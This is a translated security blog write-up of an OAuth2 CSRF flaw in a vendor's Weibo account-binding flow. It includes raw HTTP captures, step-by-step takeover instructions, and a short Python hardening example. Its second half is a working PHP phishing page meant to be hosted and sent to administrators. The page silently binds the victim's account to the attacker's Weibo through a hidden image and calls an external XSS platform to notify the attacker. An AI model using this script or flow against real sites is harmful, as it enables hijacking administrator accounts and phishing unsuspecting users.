Vulnerability mining: OAuth2.0 authentication flaw at a certain vendor


To protect the vendor and myself, the project address in this article has been replaced with a.test.com.

1: Website login

2: Social account binding page

0x02.1 Request package 1:

Request:

GET https://www.a.test.com/users/auth/weibo?can_transfer=true HTTP/1.1
Host: www.a.test.com

Response:

HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:32 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D
Cache-Control: no-cache
Set-Cookie: read_mode=day; path=/
Set-Cookie: default_font=font2; path=/
Set-Cookie: locale=zh-CN; path=/
Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:32 -0000; secure; HttpOnly
Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: a921c890-a33b-4b52-ab49-bc67597e3cca
X-Runtime: 0.064185
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: cache15.l2cm12-6(78,0), cache6.cn544(108,0)
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053323375762e
Content-Length: 290
<html><body>You are being <a href="https://api.weibo.com/oauth2/authorize?client_id=1881139527&amp;redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&amp;response_type=code&amp;state=%257B%2522can_transfer%2522%253A%2522true%2522%257D">redirected</a>.</body></html>

0x02.2 Request package 2:

Request:

GET https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D HTTP/1.1
Host: api.weibo.com

Response:

HTTP/1.1 302 Found
Server: nginx/1.6.1
Date: Mon, 18 Mar 2019 10:35:32 GMT
Content-Length: 0
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af

0x02.3 Request package 3:

Request:

GET https://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af HTTP/1.1
Host: www.a.test.com

Response:

HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:33 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://www.a.test.com/settings/profile
Cache-Control: no-cache
Set-Cookie: read_mode=day; path=/
Set-Cookie: default_font=font2; path=/
Set-Cookie: locale=zh-CN; path=/
Set-Cookie: bind_sns_result=%257B%2522code%2522%3A-1%257D; path=/; expires=Mon, 18 Mar 2019 10:40:33 -0000
Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:33 -0000; secure; HttpOnly
Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: 4f4b792f-967e-45f8-a71d-adb88e600e19
X-Runtime: 0.391071
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: cache15.l2cm12-6(403,0), cache6.cn544(434,0)
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053326897836e
Content-Length: 106
<html><body>You are being <a href="https://www.a.test.com/settings/profile">redirected</a>.</body></html>

Here you need one Weibo account and two accounts at the vendor.

  1. Weibo account: 182**77 (attacker)

  2. Vendor account A: 33*493@qq.com (attacker)

  3. Vendor account B: 28*165@qq.com (innocent victim)

Step 1: Attacker - log in to Weibo
Step 2: Attacker - log in with vendor account A

    From the above there are actually many social accounts that can be bound for quick login, but far fewer users have bound Weibo, so that is the one we use.

Step 3: Attacker - click "bind Weibo" and capture the packets

    Bind Weibo URL: https://www.a.test.com/users/auth/weibo/callback?state={"can_transfer"%3A"true"}&code=c593bc150745c37a4d5ec05332d406af
    The code in this URL is my one-time Weibo token.

Step 4: Innocent victim - log in with vendor account B

    Send the URL to account B to open: https://www.a.test.com/users/auth/weibo/callback?state={"can_transfer"%3A"true"}&code=c593bc150745c37a4d5ec05332d406af

    At this point it reports that the binding succeeded~~~ Hehehehe

Step 5: Attacker - in the browser, click log in and choose Weibo
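The root cause visible in the captured flow is that `state` carries only `{"can_transfer":"true"}` and nothing tied to the session that started the flow, so the callback link is accepted by whichever browser opens it. The following is an added Python example, not the vendor's code: the captured state handling beside a hardened version that binds a random, single-use `state` to the initiating session and keeps the application data server-side. The session dicts, the `provider_redirect` stand-in for Weibo and the reuse of the captured `code` value are constructed for the demonstration.

```python
import hmac
import json
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

AUTHORIZE = "https://api.weibo.com/oauth2/authorize"
CALLBACK = "http://www.a.test.com/users/auth/weibo/callback"
CLIENT_ID = "1881139527"  # client_id from the captured Location header


def _query(url):
    # First value of each query parameter, percent-decoded.
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def _authorize(state):
    return AUTHORIZE + "?" + urlencode({"client_id": CLIENT_ID, "redirect_uri": CALLBACK,
                                        "response_type": "code", "state": state})


def authorize_url_vulnerable(can_transfer):
    # As captured: state carries only application data, nothing tied to the session.
    return _authorize(json.dumps({"can_transfer": can_transfer}, separators=(",", ":")))


def callback_vulnerable(session, callback_url):
    q = _query(callback_url)
    session["can_transfer"] = json.loads(q["state"])["can_transfer"]
    return "bound", q["code"]  # whichever browser opens the link gets this code bound


def authorize_url_hardened(session, can_transfer):
    nonce = secrets.token_urlsafe(32)  # unguessable, known only to this session
    session["oauth_state"] = nonce
    session["oauth_params"] = {"can_transfer": can_transfer}  # app data stays server-side
    return _authorize(nonce)


def callback_hardened(session, callback_url):
    q = _query(callback_url)
    expected = session.pop("oauth_state", None)  # single use, so a replay fails too
    if expected is None or "code" not in q or not hmac.compare_digest(
            expected.encode(), q.get("state", "").encode()):
        return "rejected", None
    session["can_transfer"] = session.pop("oauth_params")["can_transfer"]
    return "bound", q["code"]


def provider_redirect(authorize_url, code):
    # Constructed stand-in for Weibo: echoes state back with the given code, like package 2.
    return CALLBACK + "?" + urlencode({"state": _query(authorize_url)["state"], "code": code})
```

With the hardened handler the forwarded callback link is rejected in the victim's session, accepted once in the attacker's own session, and rejected again on replay.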

First of all, from my observation, this vendor uses the same account system for the front end and the back end :)

Attack ideas:

  1. The vendor has a feature for writing a message to the administrator; we can put a malicious short link in it, lure the administrator into opening it so that their account gets bound to our Weibo, and then log in to the back end.

  2. Use a Sina short domain (to lower the administrator's guard).

  3. When someone opens the URL, a notification email is sent to my QQ mailbox.

  Once this script is done, the ideal attack flow looks like this:
  Victim --> clicks the Sina short link --> redirected to my phishing site --> the page outputs the binding URL and performs the binding --> the XSS platform sends me a notification email --> the page shows 404 --> done

# a_test_oauth_csrf.php
# Then rename this file, host it on a public server, and wait for the phishing to land
<?php
function curlRequest($url, $post = array(), $cookie = '', $referurl = '') {
    if (!$referurl) {
        $referurl = 'https://www.a.test.com';
    }
    $header = array(
        'Content-Type:application/x-www-form-urlencoded',
        'X-Requested-With:XMLHttpRequest',
    );
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)');
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, $referurl);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    if ($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
    }
    if ($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($curl);
    // 'redirect_url' in the transfer info is the Location the provider answered with
    $header_data = curl_getinfo($curl);
    if (curl_errno($curl)) {
        $error = curl_error($curl);
        curl_close($curl);
        return $error;
    }
    curl_close($curl);
    return $header_data;
}
// The vendor's authorization URL - can simply be hard-coded
$url = 'https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D';
// Put your Sina Weibo cookie here
$cookie = '我的cookie可不给你们哦';
$result = curlRequest($url, array(), $cookie);
// Those two scripts can come from any XSS platform
// one signals that the login has expired
// the other signals that the phishing succeeded
if (!is_array($result) || empty($result['redirect_url'])) {
    // echo 'login expired';
    echo '<ScRipT sRc=http://xxxxx.cn/ExiptZI></SCriPt>';
} else {
    // echo 'still in business';
    // echo $result['redirect_url'];
    echo '<img src="'.$result['redirect_url'].'" style="display:none;">';
    echo '<ScRipT sRc=http://xxxxx.cn/Exi0TCW></SCriPt>';
}
http_response_code(404);
echo '<div>404 网页已删除</div>';

Host it on a public server: http://127.0.0.1/a_test_oauth_csrf.php, then send it to the various administrators.

Then sit back quietly and wait.

XSS platform: http://xss.tf


Original text: https://www.yuque.com/pmiaowu/web_security_1/sq87w6#Hn7mV
